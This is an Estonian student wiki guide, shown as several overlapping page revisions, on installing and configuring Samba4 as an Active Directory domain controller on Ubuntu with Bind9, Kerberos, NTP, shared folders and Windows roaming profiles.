cp /var/lib/samba/private/krb5.conf /etc/
</source>

Kuna Kerberos on vaikimisi olemas Samba4 installimisega, siis oleks vaja selle töökorda ja seadistusi kontrollida: <br>
Paigaldame krb5-user paketi:
<source lang=bash>
apt-get install krb5-user
</source>

Paigaldamise käigus küsib ta realm'i. Meie näite puhul on selleks "samba.piix.ee".
<br>

Muudame Kerberose konfifaili /etc/krb5.conf selliseks:
<source lang=bash>
[libdefaults]
default_realm = samba.piix.ee
dns_lookup_realm = true
dns_lookup_kdc = true
</source>

==Network Time Protocol==
Kuna Samba annab domeeni liikmetele ka kellaajad kätte, siis soovime, et ka serveril endal oleks õige kellaaeg ja seda saame teha järgnevalt:
<br>
Paigaldame NTP
<source lang=bash>
apt-get install ntp
</source>
Seadistame ära muutes /etc/ntp.conf faili, lisades serverite nimekirja esimeseks:
<source lang=bash>
server 2.ee.pool.ntp.org
</source>
Teeme esimese aja pärimise ja paneme teenuse tööle:
<source lang=bash>
service ntp stop
ntpdate -B 2.ee.pool.ntp.org
service ntp start
</source>
Kontrollime, kas töötab:
<source lang=bash>
ntpq -p
</source>

=='Kontroll'==
Kontrollime, Samba4 töökorda:
<source lang=bash>
smbclient -L samba.piix.ee -U%
</source>
Väljund kuvatakse väljajagatud failide/kausta/printerite nimekiri:
<source lang=bash>

Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
IPC$ IPC IPC Service

</source>
Autentimise kontrollimiseks käivitame käsu:
<source lang=bash>
smbclient //samba.piix.ee/netlogon -UAdministrator%'Student1' -c 'ls'
</source>
Väljundiks kuvatakse netlogon kausta sisu.<br>
<br>
Kontrollime, kas Kerberos server töötab. Küsitakse admin parooli ("Student1"):
<source lang=bash>
kinit Administrator@samba.piix.ee
</source>
Töökorras olekus väljundit ei kuvata.<br>
Kontrollime, kas Kerberos annab välja pileti ehk Ticketi:
<source lang=bash>
klist
</source>
Tulemuks kuvatakse:
<source lang=bash>
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: Administrator@samba.piix.ee

Valid starting Expires Service principal
01/07/13 23:51:12 01/08/13 09:51:12 krbtgt/samba.piix.ee@samba.piix.ee
renew until 01/08/13 23:51:09

</source>
<br>

=Kasutajate ja gruppide ning jagatavate kaustade loomine=
Loome kaustad "share" ja "opilane":
<source lang=bash>
mkdir -p /var/data/share
mkdir -p /var/data/profiles
</source>
Loome ka vastavad kasutajad ja grupid:
<source lang=bash>
adduser share
adduser opilane
addgroup jagatud
addgroup opilane
adduser share jagatud
adduser opilane opilane
samba-tool user add share
samba-tool user add opilane
</source>
Anname kaustadele ka vastavad omanikud ning grupid:
<source lang=bash>
chown share:jagatud /var/data/share
chown opilane:opilane /var/data/profiles
</source>

=Loodud kaustade väljajagamine ja õiguste määramised=
Avame Samba4 konfiguratsioonifaili smb.conf:
<source lang=bash>
nano /etc/samba/smb.conf
</source>
Lisame lõppu järgmised read:
<source lang=bash>
[share]
path = /var/data/share
comment = yldine jagatud ketas
read only = No

[profiles]
path = /var/data/profiles
comment = opilaste jagatud ketas
read only = no
</source>
Et kaustad välja jagada, teeme Samba4'le restardi:
<source lang=bash>
service samba4 restart
</source>
Kuna Samba4's enam ei saa smb.conf'i faili kaudu kaustadele õigusi lisada. Active Directory kaudu läbi Windowsi masina saab Administraatori kontoga teha "profiles" kaustade alla igale kasutajale oma kausta ehk "roaming profile"-i.<br>
Tuleb meeles pidada, et roaming profile's tuleb domeenis sisse logida sama Windows-versiooni masinaga. Erinevate Windowsite alt sisse logides samas domeenis genereeritakse Profiles kausta topelt kasutaja kaust nign see pole esimese loodud kasutaja kaustaga ühenduses.<br>
<br>
Windowsi klientmasinas, kuhu on installeeritud kaughalduse programm administreerimaks domeeni serverit, tuleb avada Start -> Run -> dsa.msc <br>
[[File:Step1.png|thumb|none|427px|dsa.msc]]
<br>

Avanenud aknas minna vastavate kasutajate juurde, avada parema klõpsuga Properties ja Profile sektsiooni ning lisada Profile Path: //192.168.56.200/profiles/%USERNAME%<br>
[[File:Step2.png|thumb|none|551px|Profile path]]

ning muudatused ära salvestada. Seejärel tuleks käivitada Start -> Run'is käsk "gpudate /force", mis sunnib uuendama Group Policy't.<br>
[[File:Step3.png|thumb|none|427px|gpupdate]] <br>

Peale seda vastava kasutajaga uuesti sisse sisselogides tehakse Profiles kausta vastava kasutajanimega kaust.
Näide serverist vaadatuna:
<source lang=bash>
# cd /var/data/profiles
# ls -l
drwxr-xr-x 12 3000012 users 4096 Aug 2 15:35 test
</source>

=Kasutatud kirjandus=
* https://wiki.itcollege.ee/index.php/Samba4_installeerimine

Zentyal SAMBA4

2013-01-08T07:06:50Z

Ulihten: /* Tehtud kaustade väljajagamine ja õiguste määramised */

Autorid: Urmo Lihten A31 ja Kersti Lang A31 (2012 sügissemester)

=Sissejuhatus=
Samba 4 võimaluste rohke failiserver.
Suurimad omadused:
* 'Active Directory' sisselogimise ja administreerimise protokollide tugi Windows XP, Windows 7 ja Mac OS X klientidele.
* NTFS tugi
* Sisemine LDAP server AD omadustega.
* Sisemine Kerberos server.
* AD sidumine DNS-ga.
* Python tugi
ja palju muud.

=Eeldused=
Kasutusel on Ubuntu 11.04, millel on juba Bind9 paigaldatud domeeniga piix.ee. Kasutusele läheb Samba 4.0.0~alpha15~git20110124.

=Paigaldamine=
==Samba4 installeerimine==
Logida sisse administraatorina:
<source lang=bash>
sudo -i
</source>
Teha tarkvara nimekirja uuendamine:
<source lang=bash>
apt-get update
</source>
Installeerida Samba4 jaoks vajalikud paketid:
<source lang=bash>
apt-get install samba4 samba4-clients
</source>
Juhul kui eksisteerib vana Samba konfiguratsiooni fail, siis see kas kustutada või teha backupiks:
<source lang=bash>
mv /etc/samba/smb.conf{,.old}
</source>

==Bind9 konfiguratsiooni faili loomine==
Eeldab, et smb.conf faili pole olemas. <br>
Samuti tuleb jälgida järgnevas käsus, et --realm juures märgitud argumendiks SAMBA.PIIX.EE kõrval tuleb --domain argumendiks kirjutada SAMBA.<br>
PIIX või millegi muu korral ei hakka Kerberos tööle korralikult.<br>
--adminpass ehk administraatori parool peab olema vähemalt ühe suure tähega ja ühe numbriga ning vähemalt 7 tähemärki pikk.<br>
<source lang=bash>
LD_PRELOAD=/usr/lib/libdcerpc.so.0.0.1 /usr/share/samba/setup/provision --realm=SAMBA.PIIX.EE \
--domain=SAMBA --adminpass=Student1 --server-role='domain controller'
</source>
Tulemuse lõpuosa peaks olema midagi sarnast:
<source lang=bash>
...
See /var/lib/samba/private/named.conf for an example configuration include file for BIND
and /var/lib/samba/private/named.txt for further documentation required for secure DNS updates
A Kerberos configuration suitable for Samba 4 has been generated at /var/lib/samba/private/krb5.conf
Please install the phpLDAPadmin configuration located at /var/lib/samba/private/phpldapadmin-config.php into /etc/phpldapadmin/config.php
Once the above files are installed, your Samba4 server will be ready to use
Server Role: domain controller
Hostname: ns
NetBIOS Domain: SAMBA
DNS Domain: samba.piix.ee
DOMAIN SID: S-1-5-21-115115566-1439331126-697070417
Admin password: Student1
</source>

==Samba4 seonduvate skriptide muutmine ja loomine==
Kuna Samba4 ei kontrolli startimisel Samba kataloogi olemasolu /var/run kaustas, siis lisame selle võimaluse:
<source lang=bash>
nano /etc/init.d/samba4
</source>

Lisame koodile juurde SAMBAPID kontrollimise read "log_daemon_msg "Starting Samba 4 daemon" "samba" "alla:
<source lang=bash>
log_daemon_msg "Starting Samba 4 daemon" "samba"

#Lisatud juurde 3 rida
if [ ! -d $(dirname $SAMBAPID) ];
then mkdir -p $(dirname $SAMBAPID)
fi
</source>

Lisaks tuleb luua fail /usr/local/sbin/samba
<source lang=bash>
nano /usr/local/sbin/samba
</source>
Selle sisuks tuleb
<source lang=bash>
#!/bin/sh
LD_PRELOAD=/usr/lib/libdcerpc.0.0.1 /usr/sbin/$(basename $0)
</source>

Teeme eelnevale ka lingid
<source lang=bash>
ln -s /usr/local/sbin/samba{,_dnsupdate}
ln -s /usr/local/sbin/samba{,_spnupdate}
</source>

Samba 4 käivitamine
<source lang=bash>
service samba4 start
</source>

==DNS seadistamine==
Muudame Bind9 konfiguratsiooni
<source lang=bash>
nano /etc/bind/named.conf.local
</source>

Kaasame Samba4 poolt loodud konfiratsiooni Bind9 seadetesse
<source lang=bash>
include "/var/lib/samba/private/named.conf";
</source>

==Apparmor'i probleem==
Kuna Apparmor kaitseb Samba4 konfiguratsiooni Bind9 eest, siis peab tegema erandid Apparmorisse.
<source lang=bash>
nano /etc/apparmor.d/usr.sbin.named
</source>
Lisada lõppu ennem viimast } märki järgmised read:
<source lang=bash>
/var/lib/samba/private/* rw,
/var/lib/samba/private/dns/* rw,
</source>
Laeme uuesti Apparmori profiilid ja teeme Bind9'le ka restardi.
<source lang=bash>
/etc/init.d/apparmor reload
/etc/init.d/bind9 restart
</source>
==Nimeserverid paika==
Kuna Samba4 kasutab Bind9 DNS lahendust, siis oleks mõistlik lisada oma /etc/resolv.conf'i oma nimeserver kui seda juba seal pole:
<source lang=bash>
nano /etc/resolv.conf
</source>
Näiteks on meil nimeserveri aadress 192.168.56.200. (tuleb lisada teistest nimekirjas olevatest nimeserveritest ettepoole, muidu pole asjast kasu ja ei võta Bind9'st vastuseid)
<source lang=bash>
name server 192.168.56.200
</source>
==Kerberose paigaldamine/seadistamine==
Tõstame Samba4 poolt loodud spetsiaalse Kerberos5 konfiguratsioonifaili kausta /etc/
<source lang=bash>
cp /var/lib/samba/private/krb5.conf /etc/
</source>
Kuna Kerberos on vaikimisi olemas Samba4 installimisega, siis oleks vaja ka seda kontrollida, et kas töötab korralikult ja kas seadistused said õigesti. <br>
Paigaldame krb5-user paketi
<source lang=bash>
apt-get install krb5-user
</source>
Paigaldamise käigus küsib ta realm'i. Meie näite puhul on selleks SAMBA.PIIX.EE
<br>
==Kontroll==
Kontrollime, kas Samba4 töötab:
<source lang=bash>
smbclient -L SAMBA.PIIX.EE -U%
</source>
Väljund peaks olema midagi sarnast ehk näitab väljajagatud failide/kausta/printerite nimekirjasid:
<source lang=bash>

Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
IPC$ IPC IPC Service

</source>
Autentimise kontrollimiseks võiks käivitada järgneva käsu:
<source lang=bash>
smbclient //SAMBA.PIIX.EE/netlogon -UAdministrator%'Student1' -c 'ls'
</source>
Väljundiks peaks tulema netlogon kausta sisu.<br>
<br>
Kontrollime, kas Kerberos server töötab. Küsitakse admin parooli ehk praegusel juhul on Student1 selleks:
<source lang=bash>
kinit Administrator@SAMBA.PIIX.EE
</source>
Edukal töötamisel ta mingit väljundit ei anna.<br>
Kontrollime, kas Kerberos annab välja ka pileti ehk Ticketi:
<source lang=bash>
klist
</source>
Tulemus peaks olema midagi sarnast:
<source lang=bash>
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: Administrator@SAMBA.PIIX.EE

Valid starting Expires Service principal
01/07/13 23:51:12 01/08/13 09:51:12 krbtgt/SAMBA.PIIX.EE@SAMBA.PIIX.EE
renew until 01/08/13 23:51:09

</source>
<br>
=Kasutajate ja gruppide ning jagatavate kaustade loomine=
Loome kaustad "share" ja "opilane".
<source lang=bash>
mkdir -p /var/data/share
mkdir -p /var/data/profiles
</source>
Loome ka vastavad kasutajad ja grupid.
<source lang=bash>
adduser share
adduser opilane
addgroup jagatud
addgroup opilane
adduser share jagatud
adduser opilane opilane
samba-tool newuser share
samba-tool newuser opilane
</source>
Anname kaustadele ka vastavad omanikud ning grupid
<source lang=bash>
chown share:jagatud /var/data/share
chown opilane:opilane /var/data/profiles
</source>

=Tehtud kaustade väljajagamine ja õiguste määramised=
Avame Samba4 konfiguratsiooni faili smb.conf
<source lang=bash>
nano /etc/samba.smb.conf
</source>
Lisame lõppu juurde järgmised read
<source lang=bash>
[share]
path = /var/data/share
comment = üldine jagatud ketas
read only = No

[profiles]
path = /var/data/profiles
comment = opilaste jagatud ketas
read only = no
</source>
Nüüd teeme Samba4-le väikese restardi ja kaustad peaksid olema seejärel väljajagatud.
<source lang=bash>
service samba4 restart
</source>
Kuna Samba4's enam ei saa smb.conf'i faili kaudu kaustadele õigusi lisada ja siis saab Active Directory kaudu läbi Windowsi masina Administraatori kontoga teha "profiles" kaustade alla igale kasutajale oma kausta ehk "roaming profile"-i.<br>
Tuleb meeles pidada, et roaming profile juures peab domeenis sisselogima sama Windowsi versiooniga masinaga. Erinevate Windowsite alt sisselogides samas domeenis genereeritakse Profiles kausta topelt kasutaja kaust ja see pole esimese loodud kasutaja kaustaga ühenduses.<br>
<br>
Windowsi klientmasinas, kuhu on installeeritud kaughalduse programm administreerimaks domeeni serverit, tuleb võtta lahti Start->Run-> dsa.msc<br>
[[File:Step1.png|thumb|dsa.msc]]
<br>
Avanenud aknas minna vastavate kasutajate juurde, võtta lahti parem klõpsuga nende Properties ja Profile sektsiooni lisada Profile Path: //192.168.56.200/profiles/%USERNAME%<br>
[[File:Step2.png|thumb|Profile path]]
ja muudatused ära salvestada ning käivitada Start->Run 'is käsk "gpudate /force", mis sunnib uuendama Group Policy't.<br>
[[File:Step3.png|thumb|gpupdate]]
<br>
Peale seda korraks väljalogides ja vastava kasutajaga sisselogides tehakse Profiles kausta vastava kasutajanimega kaust.
Näide serverist vaadatuna:
<source lang=bash>
# cd /var/data/profiles
# ls -l
drwxr-xr-x 12 3000012 users 4096 Aug 2 15:35 test
</source>

File:Step3.png

2013-01-08T07:06:24Z

Ulihten:

File:Step2.png

2013-01-08T07:05:37Z

Ulihten:

File:Step1.png

2013-01-08T07:03:56Z

Ulihten:

Zentyal SAMBA4

2013-01-08T06:58:50Z

Ulihten: /* Tehtud kaustade väljajagamine ja õiguste määramised */

Autorid: Urmo Lihten A31 ja Kersti Lang A31 (2012 sügissemester)

=Sissejuhatus=
Samba 4 võimaluste rohke failiserver.
Suurimad omadused:
* 'Active Directory' sisselogimise ja administreerimise protokollide tugi Windows XP, Windows 7 ja Mac OS X klientidele.
* NTFS tugi
* Sisemine LDAP server AD omadustega.
* Sisemine Kerberos server.
* AD sidumine DNS-ga.
* Python tugi
ja palju muud.

=Eeldused=
Kasutusel on Ubuntu 11.04, millel on juba Bind9 paigaldatud domeeniga piix.ee. Kasutusele läheb Samba 4.0.0~alpha15~git20110124.

=Paigaldamine=
==Samba4 installeerimine==
Logida sisse administraatorina:
<source lang=bash>
sudo -i
</source>
Teha tarkvara nimekirja uuendamine:
<source lang=bash>
apt-get update
</source>
Installeerida Samba4 jaoks vajalikud paketid:
<source lang=bash>
apt-get install samba4 samba4-clients
</source>
Juhul kui eksisteerib vana Samba konfiguratsiooni fail, siis see kas kustutada või teha backupiks:
<source lang=bash>
mv /etc/samba/smb.conf{,.old}
</source>

==Bind9 konfiguratsiooni faili loomine==
Eeldab, et smb.conf faili pole olemas. <br>
Samuti tuleb jälgida järgnevas käsus, et --realm juures märgitud argumendiks SAMBA.PIIX.EE kõrval tuleb --domain argumendiks kirjutada SAMBA.<br>
PIIX või millegi muu korral ei hakka Kerberos tööle korralikult.<br>
--adminpass ehk administraatori parool peab olema vähemalt ühe suure tähega ja ühe numbriga ning vähemalt 7 tähemärki pikk.<br>
<source lang=bash>
LD_PRELOAD=/usr/lib/libdcerpc.so.0.0.1 /usr/share/samba/setup/provision --realm=SAMBA.PIIX.EE \
--domain=SAMBA --adminpass=Student1 --server-role='domain controller'
</source>
Tulemuse lõpuosa peaks olema midagi sarnast:
<source lang=bash>
...
See /var/lib/samba/private/named.conf for an example configuration include file for BIND
and /var/lib/samba/private/named.txt for further documentation required for secure DNS updates
A Kerberos configuration suitable for Samba 4 has been generated at /var/lib/samba/private/krb5.conf
Please install the phpLDAPadmin configuration located at /var/lib/samba/private/phpldapadmin-config.php into /etc/phpldapadmin/config.php
Once the above files are installed, your Samba4 server will be ready to use
Server Role: domain controller
Hostname: ns
NetBIOS Domain: SAMBA
DNS Domain: samba.piix.ee
DOMAIN SID: S-1-5-21-115115566-1439331126-697070417
Admin password: Student1
</source>

==Samba4 seonduvate skriptide muutmine ja loomine==
Kuna Samba4 ei kontrolli startimisel Samba kataloogi olemasolu /var/run kaustas, siis lisame selle võimaluse:
<source lang=bash>
nano /etc/init.d/samba4
</source>

Lisame koodile juurde SAMBAPID kontrollimise read "log_daemon_msg "Starting Samba 4 daemon" "samba" "alla:
<source lang=bash>
log_daemon_msg "Starting Samba 4 daemon" "samba"

#Lisatud juurde 3 rida
if [ ! -d $(dirname $SAMBAPID) ];
then mkdir -p $(dirname $SAMBAPID)
fi
</source>

Lisaks tuleb luua fail /usr/local/sbin/samba
<source lang=bash>
nano /usr/local/sbin/samba
</source>
Selle sisuks tuleb
<source lang=bash>
#!/bin/sh
LD_PRELOAD=/usr/lib/libdcerpc.0.0.1 /usr/sbin/$(basename $0)
</source>

Teeme eelnevale ka lingid
<source lang=bash>
ln -s /usr/local/sbin/samba{,_dnsupdate}
ln -s /usr/local/sbin/samba{,_spnupdate}
</source>

Samba 4 käivitamine
<source lang=bash>
service samba4 start
</source>

==DNS seadistamine==
Muudame Bind9 konfiguratsiooni
<source lang=bash>
nano /etc/bind/named.conf.local
</source>

Kaasame Samba4 poolt loodud konfiratsiooni Bind9 seadetesse
<source lang=bash>
include "/var/lib/samba/private/named.conf";
</source>

==Apparmor'i probleem==
Kuna Apparmor kaitseb Samba4 konfiguratsiooni Bind9 eest, siis peab tegema erandid Apparmorisse.
<source lang=bash>
nano /etc/apparmor.d/usr.sbin.named
</source>
Lisada lõppu ennem viimast } märki järgmised read:
<source lang=bash>
/var/lib/samba/private/* rw,
/var/lib/samba/private/dns/* rw,
</source>
Laeme uuesti Apparmori profiilid ja teeme Bind9'le ka restardi.
<source lang=bash>
/etc/init.d/apparmor reload
/etc/init.d/bind9 restart
</source>
==Nimeserverid paika==
Kuna Samba4 kasutab Bind9 DNS lahendust, siis oleks mõistlik lisada oma /etc/resolv.conf'i oma nimeserver kui seda juba seal pole:
<source lang=bash>
nano /etc/resolv.conf
</source>
Näiteks on meil nimeserveri aadress 192.168.56.200. (tuleb lisada teistest nimekirjas olevatest nimeserveritest ettepoole, muidu pole asjast kasu ja ei võta Bind9'st vastuseid)
<source lang=bash>
name server 192.168.56.200
</source>
==Kerberose paigaldamine/seadistamine==
Tõstame Samba4 poolt loodud spetsiaalse Kerberos5 konfiguratsioonifaili kausta /etc/
<source lang=bash>
cp /var/lib/samba/private/krb5.conf /etc/
</source>
Kuna Kerberos on vaikimisi olemas Samba4 installimisega, siis oleks vaja ka seda kontrollida, et kas töötab korralikult ja kas seadistused said õigesti. <br>
Paigaldame krb5-user paketi
<source lang=bash>
apt-get install krb5-user
</source>
Paigaldamise käigus küsib ta realm'i. Meie näite puhul on selleks SAMBA.PIIX.EE
<br>
==Kontroll==
Kontrollime, kas Samba4 töötab:
<source lang=bash>
smbclient -L SAMBA.PIIX.EE -U%
</source>
Väljund peaks olema midagi sarnast ehk näitab väljajagatud failide/kausta/printerite nimekirjasid:
<source lang=bash>

Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
IPC$ IPC IPC Service

</source>
Autentimise kontrollimiseks võiks käivitada järgneva käsu:
<source lang=bash>
smbclient //SAMBA.PIIX.EE/netlogon -UAdministrator%'Student1' -c 'ls'
</source>
Väljundiks peaks tulema netlogon kausta sisu.<br>
<br>
Kontrollime, kas Kerberos server töötab. Küsitakse admin parooli ehk praegusel juhul on Student1 selleks:
<source lang=bash>
kinit Administrator@SAMBA.PIIX.EE
</source>
Edukal töötamisel ta mingit väljundit ei anna.<br>
Kontrollime, kas Kerberos annab välja ka pileti ehk Ticketi:
<source lang=bash>
klist
</source>
Tulemus peaks olema midagi sarnast:
<source lang=bash>
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: Administrator@SAMBA.PIIX.EE

Valid starting Expires Service principal
01/07/13 23:51:12 01/08/13 09:51:12 krbtgt/SAMBA.PIIX.EE@SAMBA.PIIX.EE
renew until 01/08/13 23:51:09

</source>
<br>
=Kasutajate ja gruppide ning jagatavate kaustade loomine=
Loome kaustad "share" ja "opilane".
<source lang=bash>
mkdir -p /var/data/share
mkdir -p /var/data/profiles
</source>
Loome ka vastavad kasutajad ja grupid.
<source lang=bash>
adduser share
adduser opilane
addgroup jagatud
addgroup opilane
adduser share jagatud
adduser opilane opilane
samba-tool newuser share
samba-tool newuser opilane
</source>
Anname kaustadele ka vastavad omanikud ning grupid
<source lang=bash>
chown share:jagatud /var/data/share
chown opilane:opilane /var/data/profiles
</source>

=Tehtud kaustade väljajagamine ja õiguste määramised=
Avame Samba4 konfiguratsiooni faili smb.conf
<source lang=bash>
nano /etc/samba.smb.conf
</source>
Lisame lõppu juurde järgmised read
<source lang=bash>
[share]
path = /var/data/share
comment = üldine jagatud ketas
read only = No

[profiles]
path = /var/data/profiles
comment = opilaste jagatud ketas
read only = no
</source>
Nüüd teeme Samba4-le väikese restardi ja kaustad peaksid olema seejärel väljajagatud.
<source lang=bash>
service samba4 restart
</source>
Kuna Samba4's enam ei saa smb.conf'i faili kaudu kaustadele õigusi lisada ja siis saab Active Directory kaudu läbi Windowsi masina Administraatori kontoga teha "profiles" kaustade alla igale kasutajale oma kausta ehk "roaming profile"-i.<br>
Tuleb meeles pidada, et roaming profile juures peab domeenis sisselogima sama Windowsi versiooniga masinaga. Erinevate Windowsite alt sisselogides samas domeenis genereeritakse Profiles kausta topelt kasutaja kaust ja see pole esimese loodud kasutaja kaustaga ühenduses.<br>
<br>
Windowsi klientmasinas, kuhu on installeeritud kaughalduse programm administreerimaks domeeni serverit, tuleb võtta lahti Start->Run-> dsa.msc<br>
<br>
Avanenud aknas minna vastavate kasutajate juurde, võtta lahti parem klõpsuga nende Properties ja Profile sektsiooni lisada Profile Path: //192.168.56.200/profiles/%USERNAME%<br>
ja muudatused ära salvestada ning käivitada Start->Run 'is käsk "gpudate /force", mis sunnib uuendama Group Policy't.<br>
<br>
Peale seda korraks väljalogides ja vastava kasutajaga sisselogides tehakse Profiles kausta vastava kasutajanimega kaust.
Näide serverist vaadatuna:
<source lang=bash>
# cd /var/data/profiles
# ls -l
drwxr-xr-x 12 3000012 users 4096 Aug 2 15:35 test
</source>

Zentyal SAMBA4

2013-01-08T06:43:30Z

Ulihten: /* Tehtud kaustade väljajagamine ja õiguste määramised */

Zentyal SAMBA4

2013-01-08T06:39:21Z

Ulihten: /* Kasutajate ja gruppide ning jagatavate kaustade loomine */

Zentyal SAMBA4

2013-01-07T22:18:34Z

Ulihten:

Autorid: Urmo Lihten A31 ja Kersti Lang A31 (2012 sügissemester)

=Sissejuhatus=
Samba 4 võimaluste rohke failiserver.
Suurimad omadused:
* 'Active Directory' sisselogimise ja administreerimise protokollide tugi Windows XP, Windows 7 ja Mac OS X klientidele.
* NTFS tugi
* Sisemine LDAP server AD omadustega.
* Sisemine Kerberos server.
* AD sidumine DNS-ga.
* Python tugi
ja palju muud.

=Eeldused=
Kasutusel on Ubuntu 11.04, millel on juba Bind9 paigaldatud domeeniga piix.ee. Kasutusele läheb Samba 4.0.0~alpha15~git20110124.

=Paigaldamine=
==Samba4 installeerimine==
Logida sisse administraatorina:
<source lang=bash>
sudo -i
</source>
Teha tarkvara nimekirja uuendamine:
<source lang=bash>
apt-get update
</source>
Installeerida Samba4 jaoks vajalikud paketid:
<source lang=bash>
apt-get install samba4 samba4-clients
</source>
Juhul kui eksisteerib vana Samba konfiguratsiooni fail, siis see kas kustutada või teha backupiks:
<source lang=bash>
mv /etc/samba/smb.conf{,.old}
</source>

==Bind9 konfiguratsiooni faili loomine==
Eeldab, et smb.conf faili pole olemas. <br>
Samuti tuleb jälgida järgnevas käsus, et --realm juures märgitud argumendiks SAMBA.PIIX.EE kõrval tuleb --domain argumendiks kirjutada SAMBA.<br>
PIIX või millegi muu korral ei hakka Kerberos tööle korralikult.<br>
--adminpass ehk administraatori parool peab olema vähemalt ühe suure tähega ja ühe numbriga ning vähemalt 7 tähemärki pikk.<br>
<source lang=bash>
LD_PRELOAD=/usr/lib/libdcerpc.so.0.0.1 /usr/share/samba/setup/provision --realm=SAMBA.PIIX.EE \
--domain=SAMBA --adminpass=Student1 --server-role='domain controller'
</source>
Tulemuse lõpuosa peaks olema midagi sarnast:
<source lang=bash>
...
See /var/lib/samba/private/named.conf for an example configuration include file for BIND
and /var/lib/samba/private/named.txt for further documentation required for secure DNS updates
A Kerberos configuration suitable for Samba 4 has been generated at /var/lib/samba/private/krb5.conf
Please install the phpLDAPadmin configuration located at /var/lib/samba/private/phpldapadmin-config.php into /etc/phpldapadmin/config.php
Once the above files are installed, your Samba4 server will be ready to use
Server Role: domain controller
Hostname: ns
NetBIOS Domain: SAMBA
DNS Domain: samba.piix.ee
DOMAIN SID: S-1-5-21-115115566-1439331126-697070417
Admin password: Student1
</source>

==Samba4 seonduvate skriptide muutmine ja loomine==
Kuna Samba4 ei kontrolli startimisel Samba kataloogi olemasolu /var/run kaustas, siis lisame selle võimaluse:
<source lang=bash>
nano /etc/init.d/samba4
</source>

Lisame koodile juurde SAMBAPID kontrollimise read "log_daemon_msg "Starting Samba 4 daemon" "samba" "alla:
<source lang=bash>
log_daemon_msg "Starting Samba 4 daemon" "samba"

#Lisatud juurde 3 rida
if [ ! -d $(dirname $SAMBAPID) ];
then mkdir -p $(dirname $SAMBAPID)
fi
</source>

Lisaks tuleb luua fail /usr/local/sbin/samba
<source lang=bash>
nano /usr/local/sbin/samba
</source>
Selle sisuks tuleb
<source lang=bash>
#!/bin/sh
LD_PRELOAD=/usr/lib/libdcerpc.0.0.1 /usr/sbin/$(basename $0)
</source>

Teeme eelnevale ka lingid
<source lang=bash>
ln -s /usr/local/sbin/samba{,_dnsupdate}
ln -s /usr/local/sbin/samba{,_spnupdate}
</source>

Samba 4 käivitamine
<source lang=bash>
service samba4 start
</source>

==DNS seadistamine==
Muudame Bind9 konfiguratsiooni
<source lang=bash>
nano /etc/bind/named.conf.local
</source>

Kaasame Samba4 poolt loodud konfiratsiooni Bind9 seadetesse
<source lang=bash>
include "/var/lib/samba/private/named.conf";
</source>

==Apparmor'i probleem==
Kuna Apparmor kaitseb Samba4 konfiguratsiooni Bind9 eest, siis peab tegema erandid Apparmorisse.
<source lang=bash>
nano /etc/apparmor.d/usr.sbin.named
</source>
Lisada lõppu ennem viimast } märki järgmised read:
<source lang=bash>
/var/lib/samba/private/* rw,
/var/lib/samba/private/dns/* rw,
</source>
Laeme uuesti Apparmori profiilid ja teeme Bind9'le ka restardi.
<source lang=bash>
/etc/init.d/apparmor reload
/etc/init.d/bind9 restart
</source>
==Nimeserverid paika==
Kuna Samba4 kasutab Bind9 DNS lahendust, siis oleks mõistlik lisada oma /etc/resolv.conf'i oma nimeserver kui seda juba seal pole:
<source lang=bash>
nano /etc/resolv.conf
</source>
Näiteks on meil nimeserveri aadress 192.168.56.200. (tuleb lisada teistest nimekirjas olevatest nimeserveritest ettepoole, muidu pole asjast kasu ja ei võta Bind9'st vastuseid)
<source lang=bash>
name server 192.168.56.200
</source>
==Kerberose paigaldamine/seadistamine==
Tõstame Samba4 poolt loodud spetsiaalse Kerberos5 konfiguratsioonifaili kausta /etc/
<source lang=bash>
cp /var/lib/samba/private/krb5.conf /etc/
</source>
Kuna Kerberos on vaikimisi olemas Samba4 installimisega, siis oleks vaja ka seda kontrollida, et kas töötab korralikult ja kas seadistused said õigesti. <br>
Paigaldame krb5-user paketi
<source lang=bash>
apt-get install krb5-user
</source>
Paigaldamise käigus küsib ta realm'i. Meie näite puhul on selleks SAMBA.PIIX.EE
<br>
==Kontroll==
Kontrollime, kas Samba4 töötab:
<source lang=bash>
smbclient -L SAMBA.PIIX.EE -U%
</source>
Väljund peaks olema midagi sarnast ehk näitab väljajagatud failide/kausta/printerite nimekirjasid:
<source lang=bash>

Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
IPC$ IPC IPC Service

</source>
Autentimise kontrollimiseks võiks käivitada järgneva käsu:
<source lang=bash>
smbclient //SAMBA.PIIX.EE/netlogon -UAdministrator%'Student1' -c 'ls'
</source>
Väljundiks peaks tulema netlogon kausta sisu.<br>
<br>
Kontrollime, kas Kerberos server töötab. Küsitakse admin parooli ehk praegusel juhul on Student1 selleks:
<source lang=bash>
kinit Administrator@SAMBA.PIIX.EE
</source>
Edukal töötamisel ta mingit väljundit ei anna.<br>
Kontrollime, kas Kerberos annab välja ka pileti ehk Ticketi:
<source lang=bash>
klist
</source>
Tulemus peaks olema midagi sarnast:
<source lang=bash>
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: Administrator@SAMBA.PIIX.EE

Valid starting Expires Service principal
01/07/13 23:51:12 01/08/13 09:51:12 krbtgt/SAMBA.PIIX.EE@SAMBA.PIIX.EE
renew until 01/08/13 23:51:09

</source>
<br>
=Kasutajate ja gruppide ning jagatavate kaustade loomine=
Loome kaustad "share" ja "opilane".
<source lang=bash>
mkdir -p /var/data/share
mkdir -p /var/data/opilane
</source>
Loome ka vastavad kasutajad ja grupid.
<source lang=bash>
adduser share
adduser opilane
addgroup jagatud
addgroup opilane
adduser share jagatud
adduser opilane opilane
samba-tool newuser share
samba-tool newuser opilane
</source>
Anname kaustadele ka vastavad omanikud ning grupid
<source lang=bash>
chown share:jagatud /var/data/share
chown opilane:opilane /var/data/share
</source>
=Tehtud kaustade väljajagamine ja õiguste määramised=
Avame Samba4 konfiguratsiooni faili smb.conf

Zentyal SAMBA4

2013-01-07T22:03:05Z

Ulihten:

Zentyal SAMBA4

2013-01-07T21:46:29Z

Ulihten:

Zentyal SAMBA4

2013-01-07T21:29:10Z

Ulihten:

Zentyal SAMBA4

2013-01-07T21:28:47Z

Ulihten: /* Samba4 startimise skripti muutmine */

Autorid: Urmo Lihten A31 ja Kersti Lang A31 (2012 sügisemester)

=Sissejuhatus=
